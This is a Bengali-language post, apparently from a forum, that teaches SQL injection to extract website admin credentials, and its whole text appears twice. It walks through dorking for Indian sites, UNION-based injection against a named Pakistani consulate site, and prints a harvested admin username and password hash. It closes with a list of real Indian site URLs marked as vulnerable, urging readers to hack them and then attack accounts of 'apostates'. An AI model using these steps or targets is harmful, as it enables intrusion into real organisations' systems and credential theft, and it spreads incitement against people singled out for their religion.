Tweet
BASIC SQL INJECTION
আজ আমি আপনাদের শিখাব কিভাবে sql injectioner মাধ্যমে একটি সাইটের
"admin username & password" বের করা যায়।
প্রথমে dorc থেকে google এর মাধ্যমে vulnerable website খুজে বের করতে হবে।
আপনি যদি কোন নির্দিষ্ট দেশের website খুইতে চান,তাহলে আপনাকে dorc এর শেষে আপনাকে সেই দেশের websiter extension যোগ করে দিতে হবে।
মনে করেন,আমি ভারতের website খুজতে চাই,তাহলে dorc টি এইরকমঃ
inurl:news.php?id =site:.in
এই সাইট আগেই হ্যাক হয়ে গেছেঃ
আমাদের টার্গেট সাইট হলঃ
আমি দেখব এই সাইটটি vulnerable কিনা?
এর জন্য সাইটটির url শেষে (ULTA KOMA) চিহ্ন দিয়ে দেখব কোন erroe messege আসে কিনা?
http://www.pakconsulatejeddah.gov.pk...how&item_id=53'
that site is vulnerable !!
এখন কাজ হল সাইটের databaser column সংখ্যা খুজে বের করা।
এর জন্য "+order+by+" কমান্ড ব্যবহার করব।
so, the database column number is=13
এ খন বের করতে হবে এই টি column থেকে কোন কোন column vulnerable
এর জন্য "union+select+" কমান্ড ব্যবহার করব।
so,2nd & 5th columns are vulnerable!!
যেই column গুলো vulnerable,সেই column গুলো ব্যবহার করে প্রয়োজনীয় তথ্য বেড় কোড়ে আনব।
এখন database এর table name গুলো ব্যবহার করব।
"group_concat(table_name) "
"+from+information_schema.tables+where+table_schem a=database()
এই কমান্ড দুটো ;
তাহলে url টি দাড়ায়
THE TABLES ARE:
//Admin//
,blocks,gallary,gallary_images,news,pages,report_f iles,reports,slideshow,url_alias,users,videos,wp_c ommentmeta,wp_comments,
wp_links,wp_options,wp_postmeta,wp_posts,wp_term_r elationships,wp_term_taxonomy,wp_terms,wp_usermeta ,wp_users
এখন কাজ হল এই table গুলো থেকে admin table খুজে বের করা।
দেখেই বুঝা যাচ্ছে "admin" এটিই হল admin table যেখানে খুজে পাব "admin table & password।
এখন কাজ হল admin table টির column গুলো বের করা।
এর জন্য ব্যবহার করব;
"group_concat(column_name)"
"+from+information_schema.columns+where+table_name =--"
এখন কাঙ্ক্ষিত table টির CHAR code বের করে আনব HACK bar এর সাহায্যে।
এখন keyboard থেকে f9 press করলে পেয়ে যাবেন HACK bar যদি আপনি HACKbar addon install করে থাকেন।
এখন পেয়ে গেলাম table টির CHAR code
CHAR code(97,100,109,105,110)
url টি হলঃ
admin table টির column গুলো পেয়ে গেলাম
column গুলো হলঃ
id,full_name,username,password,email,user_id,full_ name,email,password
এখান থেকে username & password বের করব
এর জন্য ব্যবহার করবঃ
"group_concat(username,0x3a,password)"
"+from+admin_table_name"
কমান্ড ব্যবহার করে।
এখন url টি হল:
আমাদের টার্গেট সাইটটির username & password পেয়ে গেলাম
username
akadmincon
password:1c6770d0e097b9a1dc3b76767991ba85
ওহে ভাইয়েরা,এই সাইটগুলো হল ভারনাবল,তাই শুরু করুন হ্যাকিং উপরের পদ্দতিতে।একটা কথা মনে রাখবেন,এই অ্যাড্রেস গুলো দেয়ার এক্তাই কারন আপনারা যেন Basic Sql Injection শিখতে পারেন। তারপর মুরতাদদের আইডিগুলোতে আক্রমণ চালাবেন।
http://www.sanklecha.in/photo-gallery.php?id=4'
http://www.oucip.in/gallery.php?id=23'
http://www.mji.co.in/gallery.php?pic=5'
http://www.mitrc.ac.in/gallery.php?id=3'
http://www.dakshindare.co.in/gallery.php?id=2'
http://www.sanklecha.in/photo-gallery.php?id=4'
http://www.oucip.in/gallery.php?id=23'
http://karavalicollege.ac.in/gallery...ngalore-videos'
http://www.mji.co.in/gallery.php?pic=5'
http://www.mitrc.ac.in/gallery.php?id=3'
http://www.oucip.in/gallery.php?id=23'
http://www.sanklecha.in/photo-gallery.php?id=4'
http://www.mitrc.ac.in/gallery.php?id=3'
http://www.dakshindare.co.in/gallery.php?id=2'
http://www.mji.co.in/gallery.php?pic=5'
http://www.brilliantstudent.in/games.php?id=4'
https://www.irma.ac.in/article.php?menuid=251'
http://www.brilliantstudent.in/games.php?id=2'
http://maids.ac.in/download.php?id=160'
http://maids.ac.in/download.php?id=182'
আজ আমি আপনাদের শিখাব কিভাবে sql injectioner মাধ্যমে একটি সাইটের
"admin username & password" বের করা যায়।
প্রথমে dorc থেকে google এর মাধ্যমে vulnerable website খুজে বের করতে হবে।
আপনি যদি কোন নির্দিষ্ট দেশের website খুইতে চান,তাহলে আপনাকে dorc এর শেষে আপনাকে সেই দেশের websiter extension যোগ করে দিতে হবে।
মনে করেন,আমি ভারতের website খুজতে চাই,তাহলে dorc টি এইরকমঃ
inurl:news.php?id =site:.in
এই সাইট আগেই হ্যাক হয়ে গেছেঃ
আমাদের টার্গেট সাইট হলঃ
আমি দেখব এই সাইটটি vulnerable কিনা?
এর জন্য সাইটটির url শেষে (ULTA KOMA) চিহ্ন দিয়ে দেখব কোন erroe messege আসে কিনা?
http://www.pakconsulatejeddah.gov.pk...how&item_id=53'
that site is vulnerable !!
এখন কাজ হল সাইটের databaser column সংখ্যা খুজে বের করা।
এর জন্য "+order+by+" কমান্ড ব্যবহার করব।
so, the database column number is=13
এ খন বের করতে হবে এই টি column থেকে কোন কোন column vulnerable
এর জন্য "union+select+" কমান্ড ব্যবহার করব।
so,2nd & 5th columns are vulnerable!!
যেই column গুলো vulnerable,সেই column গুলো ব্যবহার করে প্রয়োজনীয় তথ্য বেড় কোড়ে আনব।
এখন database এর table name গুলো ব্যবহার করব।
"group_concat(table_name) "
"+from+information_schema.tables+where+table_schem a=database()
এই কমান্ড দুটো ;
তাহলে url টি দাড়ায়
THE TABLES ARE:
//Admin//
,blocks,gallary,gallary_images,news,pages,report_f iles,reports,slideshow,url_alias,users,videos,wp_c ommentmeta,wp_comments,
wp_links,wp_options,wp_postmeta,wp_posts,wp_term_r elationships,wp_term_taxonomy,wp_terms,wp_usermeta ,wp_users
এখন কাজ হল এই table গুলো থেকে admin table খুজে বের করা।
দেখেই বুঝা যাচ্ছে "admin" এটিই হল admin table যেখানে খুজে পাব "admin table & password।
এখন কাজ হল admin table টির column গুলো বের করা।
এর জন্য ব্যবহার করব;
"group_concat(column_name)"
"+from+information_schema.columns+where+table_name =--"
এখন কাঙ্ক্ষিত table টির CHAR code বের করে আনব HACK bar এর সাহায্যে।
এখন keyboard থেকে f9 press করলে পেয়ে যাবেন HACK bar যদি আপনি HACKbar addon install করে থাকেন।
এখন পেয়ে গেলাম table টির CHAR code
CHAR code(97,100,109,105,110)
url টি হলঃ
admin table টির column গুলো পেয়ে গেলাম
column গুলো হলঃ
id,full_name,username,password,email,user_id,full_ name,email,password
এখান থেকে username & password বের করব
এর জন্য ব্যবহার করবঃ
"group_concat(username,0x3a,password)"
"+from+admin_table_name"
কমান্ড ব্যবহার করে।
এখন url টি হল:
আমাদের টার্গেট সাইটটির username & password পেয়ে গেলাম
username
akadminconpassword:1c6770d0e097b9a1dc3b76767991ba85
ওহে ভাইয়েরা,এই সাইটগুলো হল ভারনাবল,তাই শুরু করুন হ্যাকিং উপরের পদ্দতিতে।একটা কথা মনে রাখবেন,এই অ্যাড্রেস গুলো দেয়ার এক্তাই কারন আপনারা যেন Basic Sql Injection শিখতে পারেন। তারপর মুরতাদদের আইডিগুলোতে আক্রমণ চালাবেন।
http://www.sanklecha.in/photo-gallery.php?id=4'
http://www.oucip.in/gallery.php?id=23'
http://www.mji.co.in/gallery.php?pic=5'
http://www.mitrc.ac.in/gallery.php?id=3'
http://www.dakshindare.co.in/gallery.php?id=2'
http://www.sanklecha.in/photo-gallery.php?id=4'
http://www.oucip.in/gallery.php?id=23'
http://karavalicollege.ac.in/gallery...ngalore-videos'
http://www.mji.co.in/gallery.php?pic=5'
http://www.mitrc.ac.in/gallery.php?id=3'
http://www.oucip.in/gallery.php?id=23'
http://www.sanklecha.in/photo-gallery.php?id=4'
http://www.mitrc.ac.in/gallery.php?id=3'
http://www.dakshindare.co.in/gallery.php?id=2'
http://www.mji.co.in/gallery.php?pic=5'
http://www.brilliantstudent.in/games.php?id=4'
https://www.irma.ac.in/article.php?menuid=251'
http://www.brilliantstudent.in/games.php?id=2'
http://maids.ac.in/download.php?id=160'
http://maids.ac.in/download.php?id=182'
Comment